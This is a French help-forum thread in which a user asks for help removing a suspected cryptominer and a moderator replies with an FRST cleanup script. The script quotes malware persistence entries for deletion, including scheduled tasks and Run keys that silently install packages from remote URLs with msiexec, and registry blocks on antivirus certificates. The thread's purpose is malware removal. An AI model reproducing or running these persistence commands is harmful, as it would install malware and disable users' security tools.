J'aimerais enlever un mineur de mon ordinateur

Fermé
michelu - 4 févr. 2018 à 04:45
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 4 févr. 2018 à 10:02
Bonjour,
j'ai besoin d'aide pour enlever de mon ordinateur ce qui me semble être un mineur ( il me prend 95% de mon processeur ) j'ai fais une analyse avec le programme FRST si quelqu'un veut bien y jeter un oeil

==shortcut== https://pjjoint.malekal.com/files.php?id=20180204_v10u12y9g12e13
---------------------------------------------------------------------------------------
==FRST== https://pjjoint.malekal.com/files.php?id=FRST_20180204_e15y9x118n11
----------------------------------------------------------------------------------------
==ADDITIONS== https://pjjoint.malekal.com/files.php?id=20180204_e11v8c8n9u7

merci

2 réponses

jeanbern Messages postés 13770 Date d'inscription vendredi 25 mars 2005 Statut Contributeur Dernière intervention 17 mars 2024 4 958
Modifié le 4 févr. 2018 à 05:31
Salut,

je remets tes liens pour l'ouverture:

SHORTCUT

FRST

ADDITIONS

0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
4 févr. 2018 à 10:02
Salut,


Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :

CCleaner
Cyberlink
McAfee Online Backup


PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

CreateRestorePoint:
CloseProcesses:
Task: {4A8E8688-792B-4D13-A142-F375D215FD4B} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION

Task: {12394F8E-2222-41B4-A9A0-952FA22D3B87} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {15EE2376-A619-44A6-AAB4-77203548764C} - System32\Tasks\Plejuphaniling => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S2Y9J9AD909011&v=201734 /q <==== ATTENTION
Task: {28DA8FD5-0CA6-42EA-8321-6ED98CA8A722} - System32\Tasks\DXdnoft Virwool => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\DXdnoft Virwool\DXdnoft Virwool.dll",awNdncUgOCnQ <==== ATTENTION
Task: {41974624-013E-480E-A4BE-9E46EDA3D67A} - System32\Tasks\Express Files Updater => C:\Program Files (x86)\ExpressFiles\EFupdater.exe [2017-08-14] (hxxp://www.express-files.com/) <==== ATTENTION
Task: {4A8E8688-792B-4D13-A142-F375D215FD4B} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
Task: {4B71DD48-EACA-4841-A946-A078EF9922DA} - System32\Tasks\wincore => C:\WINDOWS\Windows\ProgramData\wincore.exe [2017-12-05] () <==== ATTENTION
ask: {5CE1BFFB-6444-41E3-97A5-76C44C25E4EA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
Task: {63F6A8A3-ECC5-43CA-BC86-0DEBBE2CB8DC} - System32\Tasks\SessionAgent => C:\windows\sysde32.exe [2017-09-24] ()
Task: {7A1F1CA5-3C5E-4077-BF59-001454909677} - System32\Tasks\{5DC18CEC-A5D6-48E3-AF2E-0B0465691F15} => C:\WINDOWS\Windows\ProgramData\svchost.exe <==== ATTENTION
Task: {83AAF366-AFFC-4277-B27B-C132996EB74F} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe <==== ATTENTION
Task: {85DB64C9-8694-420B-89BD-0368E38E6ABC} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== ATTENTION
Task: {ACEE87DD-DF12-4C27-8F68-FD8254E7012E} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {CA53239F-EB0A-40B2-990A-1398BEE3EC3E} - System32\Tasks\{47791521-7C5C-4DFE-B693-BF6444ED018B} => rundll32.exe "C:\Users\MSI\AppData\Local\Microsoft\Common Files\cache.dat",StaticCache
Task: {D5E0BB54-5CF8-49CB-92B2-CBAD05330A26} - System32\Tasks\ShadowsocksS => C:\Applications\Service.exe [2017-09-17] (TODO: <Company name>)
Task: {DDDDFB51-191A-4A2F-BF8F-D29504D8EB71} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {E267D716-03E2-44F8-9E5E-B124852F1927} - System32\Tasks\Microsoft System Optimizer => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Microsoft System Optimizer\Microsoft System Optimizer.dll",mulfsyrcTvru <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
HKLM\...\RunOnce: [MICHEL] => C:\WINDOWS\TEMP\gDFC2.tmp.exe [206848 2018-02-02] () <==== ATTENTION
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [background_fault] => C:\Users\MSI\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [Microsoft Update] => C:\Users\MSI\AppData\Local\Microsoft Windows\svchost.exe [349184 2017-06-13] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [Microsoft Viewer Monitor Manager] => C:\Users\MSI\AppData\Local\Microsoft Windows\taskhost.exe [309248 2017-06-21] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [msiql] => C:\Users\MSI\AppData\Local\Temp\00011815\msiql.exe /RUNNING <==== ATTENTION
HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [84327] => C:\Users\MSI\AppData\Roaming\ov2023ydghe\yxhziw3fk24.exe /VERYSILENT
HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Run: [5RVL2Q132WIP9AS] => C:\Program Files\G1YG0O417L\G1YG0O417.exe
HKU\S-1-5-21-2322100764-1670339980-1462021490-1003\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8dRWkyFUUdNYEcRTY5NdF8NWwxNTVLMdZWOTq5OTk8Fq== /q <==== ATTENTION [Pays US - 104.28.16.238]
HKU\S-1-5-18\...\RunOnce: [zZHILNIspz] => C:\WINDOWS\system32\config\SYSTEM~1\AppData\Local\BJIHIW~1\rdsvc.exe
HKU\S-1-5-18\...\RunOnce: [KyhuRAcNvF] => C:\WINDOWS\system32\config\SYSTEM~1\AppData\Local\YXVHVH~1\win32k.exe
HKLM\...\Providers\epb6drvn: C:\Program Files (x86)\Shibusypercight Update\local64spl.dll [305152 2017-03-04] () <==== ATTENTION
IFEO\taskmgr.exe: [Debugger]
ShellExecuteHooks: Pas de nom - {CAE9E212-FD94-11E6-9EE3-64006A5CFC23} - -> Pas de fichier
ShellExecuteHooks: Pas de nom - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\Users\MSI\AppData\Roaming\tmp546.dat [2307072 2017-10-25] ()
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) <==== ATTENTION
2017-11-01 09:26 - 2017-10-25 18:26 - 002307072 ___SH () C:\Users\MSI\AppData\Roaming\tmp546.dat
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.



0